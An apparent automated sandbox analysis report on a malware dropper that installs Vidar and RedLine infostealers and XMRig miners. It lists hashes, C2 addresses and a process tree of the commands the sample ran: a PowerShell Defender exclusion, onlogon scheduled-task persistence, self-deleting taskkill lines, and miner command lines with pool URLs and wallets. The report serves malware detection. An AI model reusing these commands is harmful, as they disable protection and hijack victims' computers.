Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

linux_amd64

Resubmissions

11-09-2021 09:47

210911-lr7snabca6 10

10-09-2021 20:48

210910-zlwebsaeh8 10

Analysis

  • max time kernel
    63s
  • max time network
    1837s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    11-09-2021 09:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.4MB

  • MD5

    65eed0fdbee8b81c1b9118f86700c6fd

  • SHA1

    fcca1e88a99e2f20403e963b798e3f68f58d638d

  • SHA256

    3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d

  • SHA512

    f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac

Score
10/10
redlinesocelarsvidarxmrig706pab123aspackv2infostealerminerstealer

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Vidar Stealer 1 IoCs
    stealer
  • XMRig Miner Payload 1 IoCs
    miner
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 45 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
              PID:780
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri192c305b4a.exe
            4⤵
            • Loads dropped DLL
            PID:384
            • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192c305b4a.exe
              Fri192c305b4a.exe
              5⤵
              • Executes dropped EXE
              PID:1656
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe
            4⤵
            • Loads dropped DLL
            PID:432
            • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192b9eeaa03b.exe
              Fri192b9eeaa03b.exe
              5⤵
              • Executes dropped EXE
              PID:1764
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri191454c4b4.exe
            4⤵
              PID:1472
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe
              4⤵
              • Loads dropped DLL
              PID:240
              • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri195cd4dbfdf37897.exe
                Fri195cd4dbfdf37897.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1596
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri192902b3c24.exe
              4⤵
              • Loads dropped DLL
              PID:1652
              • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192902b3c24.exe
                Fri192902b3c24.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1588
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 984
                  6⤵
                  • Program crash
                  PID:2904
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri19d30056588.exe
              4⤵
              • Loads dropped DLL
              PID:1140
              • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19d30056588.exe
                Fri19d30056588.exe
                5⤵
                • Executes dropped EXE
                PID:952
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe
              4⤵
              • Loads dropped DLL
              PID:964
              • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri1921f7a9d3.exe
                Fri1921f7a9d3.exe
                5⤵
                • Executes dropped EXE
                PID:568
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe
              4⤵
              • Loads dropped DLL
              PID:740
              • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri192f077acf656dd.exe
                Fri192f077acf656dd.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1264
                • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2152
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                    7⤵
                      PID:1996
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                        8⤵
                        • Creates scheduled task(s)
                        PID:2188
                    • C:\Users\Admin\AppData\Roaming\services64.exe
                      "C:\Users\Admin\AppData\Roaming\services64.exe"
                      7⤵
                        PID:2312
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                          8⤵
                            PID:2844
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                              9⤵
                              • Creates scheduled task(s)
                              PID:2948
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                            8⤵
                              PID:2020
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                              8⤵
                                PID:2832
                          • C:\Users\Admin\AppData\Local\Temp\1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1.exe"
                            6⤵
                              PID:2204
                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                              "C:\Users\Admin\AppData\Local\Temp\2.exe"
                              6⤵
                                PID:2260
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 2260 -s 1396
                                  7⤵
                                  • Program crash
                                  PID:2864
                              • C:\Users\Admin\AppData\Local\Temp\3.exe
                                "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                6⤵
                                  PID:2312
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    7⤵
                                      PID:2440
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "LzmwAqmV.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" & exit
                                        8⤵
                                          PID:2988
                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                      "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                      6⤵
                                        PID:2428
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 2428 -s 864
                                          7⤵
                                          • Program crash
                                          PID:2588
                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                        6⤵
                                          PID:2488
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 2488 -s 888
                                            7⤵
                                            • Program crash
                                            PID:2788
                                        • C:\Users\Admin\AppData\Local\Temp\6.exe
                                          "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                          6⤵
                                            PID:2564
                                            • C:\Windows\system32\WerFault.exe
                                              C:\Windows\system32\WerFault.exe -u -p 2564 -s 1368
                                              7⤵
                                              • Program crash
                                              PID:3000
                                          • C:\Users\Admin\AppData\Local\Temp\7.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7.exe"
                                            6⤵
                                              PID:2640
                                              • C:\Windows\system32\WerFault.exe
                                                C:\Windows\system32\WerFault.exe -u -p 2640 -s 888
                                                7⤵
                                                • Program crash
                                                PID:2916
                                            • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                              6⤵
                                                PID:2704
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe
                                            4⤵
                                            • Loads dropped DLL
                                            PID:1488
                                            • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19927b4fe38a9d1.exe
                                              Fri19927b4fe38a9d1.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:1608
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe
                                            4⤵
                                            • Loads dropped DLL
                                            PID:1628
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe
                                            4⤵
                                            • Loads dropped DLL
                                            PID:1592
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone
                                            4⤵
                                            • Loads dropped DLL
                                            PID:904
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19b9b73e83c948b1d.exe
                                      Fri19b9b73e83c948b1d.exe /mixone
                                      1⤵
                                      • Executes dropped EXE
                                      PID:648
                                    • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19870e2febf5544.exe
                                      Fri19870e2febf5544.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:564
                                    • C:\Users\Admin\AppData\Local\Temp\is-TUAI8.tmp\Fri195cd4dbfdf37897.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-TUAI8.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$4012E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri195cd4dbfdf37897.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Modifies system certificate store
                                      • Suspicious use of FindShellTrayWindow
                                      PID:968
                                      • C:\Users\Admin\AppData\Local\Temp\is-RV4AF.tmp\Setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-RV4AF.tmp\Setup.exe" /Verysilent
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2076
                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                          "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                          3⤵
                                            PID:2912
                                            • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                              4⤵
                                                PID:2060
                                                • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                  C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                  5⤵
                                                    PID:2784
                                                • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                  4⤵
                                                    PID:2820
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
                                                      5⤵
                                                        PID:2656
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /im "foradvertising.exe" /f
                                                          6⤵
                                                          • Kills process with taskkill
                                                          PID:1780
                                                    • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                                      4⤵
                                                        PID:1084
                                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                                          5⤵
                                                            PID:2628
                                                        • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                          4⤵
                                                            PID:2120
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631101336 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                              5⤵
                                                                PID:2764
                                                            • C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
                                                              4⤵
                                                                PID:1204
                                                            • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                              "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                              3⤵
                                                                PID:1664
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC95B82F4\Fri19ca03f05489b.exe
                                                            Fri19ca03f05489b.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2044
                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                            1⤵
                                                              PID:2800
                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2800 CREDAT:275457 /prefetch:2
                                                                2⤵
                                                                  PID:2452
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im "LzmwAqmV.exe" /f
                                                                1⤵
                                                                • Kills process with taskkill
                                                                PID:3056
                                                              • C:\Users\Admin\AppData\Local\Temp\is-0LETL.tmp\stats.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-0LETL.tmp\stats.tmp" /SL5="$202E6,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                1⤵
                                                                  PID:2268
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-HPJ2E.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-HPJ2E.tmp\Setup.exe" /Verysilent
                                                                    2⤵
                                                                      PID:4300
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                        3⤵
                                                                          PID:2648
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                            4⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:5968
                                                                        • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                          3⤵
                                                                            PID:2104
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                              4⤵
                                                                                PID:6132
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                  5⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:864
                                                                              • C:\Windows\System32\conhost.exe
                                                                                C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                                4⤵
                                                                                  PID:7016
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                            1⤵
                                                                            • Process spawned unexpected child process
                                                                            PID:2844
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                              2⤵
                                                                                PID:1972
                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              1⤵
                                                                              • Process spawned unexpected child process
                                                                              PID:2572
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                2⤵
                                                                                  PID:1336
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                1⤵
                                                                                  PID:2004
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  1⤵
                                                                                    PID:2356
                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                    1⤵
                                                                                      PID:940
                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 1CA53481ADB2B6F41799DE7DB7270FDC C
                                                                                        2⤵
                                                                                          PID:2856
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 15C191C01463BB290422FCF120F35417
                                                                                          2⤵
                                                                                            PID:1644
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                              3⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2256
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding DBAAC1D089CEA0D4A2717A3C389DD7A8 M Global\MSI0000
                                                                                            2⤵
                                                                                              PID:1496
                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                            taskeng.exe {F6F68078-9A28-4F61-BE69-8324F99B7580} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                            1⤵
                                                                                              PID:652
                                                                                              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                                                                                                2⤵
                                                                                                  PID:1500
                                                                                                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                                                                                                  2⤵
                                                                                                    PID:2128
                                                                                                  • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                    "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                                                                                    2⤵
                                                                                                      PID:612
                                                                                                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                                                                                      2⤵
                                                                                                        PID:2032
                                                                                                      • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                        "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                                                                                        2⤵
                                                                                                          PID:2100
                                                                                                        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                                                                                          2⤵
                                                                                                            PID:3456

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • memory/780-228-0x0000000004A20000-0x0000000004A21000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/780-227-0x0000000001F60000-0x0000000002BAA000-memory.dmp

                                                                                                          Filesize

                                                                                                          12.3MB

                                                                                                          Download

                                                                                                        • memory/780-226-0x0000000002310000-0x0000000002311000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-194-0x00000000003C0000-0x00000000003FC000-memory.dmp

                                                                                                          Filesize

                                                                                                          240KB

                                                                                                          Download

                                                                                                        • memory/968-199-0x0000000001DC0000-0x0000000001DC1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-204-0x0000000001E00000-0x0000000001E01000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-205-0x00000000038F0000-0x00000000038F1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-207-0x0000000003900000-0x0000000003901000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-196-0x0000000000540000-0x0000000000541000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-197-0x0000000000550000-0x0000000000551000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-203-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-209-0x0000000003910000-0x0000000003911000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-210-0x0000000003920000-0x0000000003921000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-211-0x0000000003930000-0x0000000003931000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-212-0x0000000003980000-0x00000000039D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                          Download

                                                                                                        • memory/968-213-0x0000000003980000-0x00000000039D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                          Download

                                                                                                        • memory/968-214-0x0000000003980000-0x00000000039D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                          Download

                                                                                                        • memory/968-215-0x0000000003980000-0x00000000039D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                          Download

                                                                                                        • memory/968-216-0x0000000003980000-0x00000000039D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                          Download

                                                                                                        • memory/968-193-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-201-0x0000000001DE0000-0x0000000001DE1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/968-195-0x0000000074361000-0x0000000074363000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                          Download

                                                                                                        • memory/968-200-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1020-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                          Filesize

                                                                                                          152KB

                                                                                                          Download

                                                                                                        • memory/1020-110-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                          Download

                                                                                                        • memory/1020-139-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                          Filesize

                                                                                                          152KB

                                                                                                          Download

                                                                                                        • memory/1020-89-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                          Filesize

                                                                                                          572KB

                                                                                                          Download

                                                                                                        • memory/1020-122-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                          Filesize

                                                                                                          572KB

                                                                                                          Download

                                                                                                        • memory/1020-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.5MB

                                                                                                          Download

                                                                                                        • memory/1020-105-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                          Download

                                                                                                        • memory/1020-108-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                          Download

                                                                                                        • memory/1020-134-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.5MB

                                                                                                          Download

                                                                                                        • memory/1020-115-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                          Download

                                                                                                        • memory/1264-217-0x0000000000330000-0x0000000000331000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          Download

                                                                                                        • memory/1588-208-0x0000000000400000-0x00000000021B7000-memory.dmp

                                                                                                          Filesize

                                                                                                          29.7MB

                                                                                                          Download

                                                                                                        • memory/1588-198-0x00000000026A0000-0x0000000004457000-memory.dmp

                                                                                                          Filesize

                                                                                                          29.7MB

                                                                                                          Download

                                                                                                        • memory/1596-180-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                          Filesize

                                                                                                          80KB

                                                                                                          Download

                                                                                                        • memory/1608-206-0x0000000000400000-0x0000000002B6E000-memory.dmp

                                                                                                          Filesize

                                                                                                          39.4MB

                                                                                                          Download

                                                                                                        • memory/1608-202-0x0000000000250000-0x0000000000280000-memory.dmp

                                                                                                          Filesize

                                                                                                          192KB

                                                                                                          Download

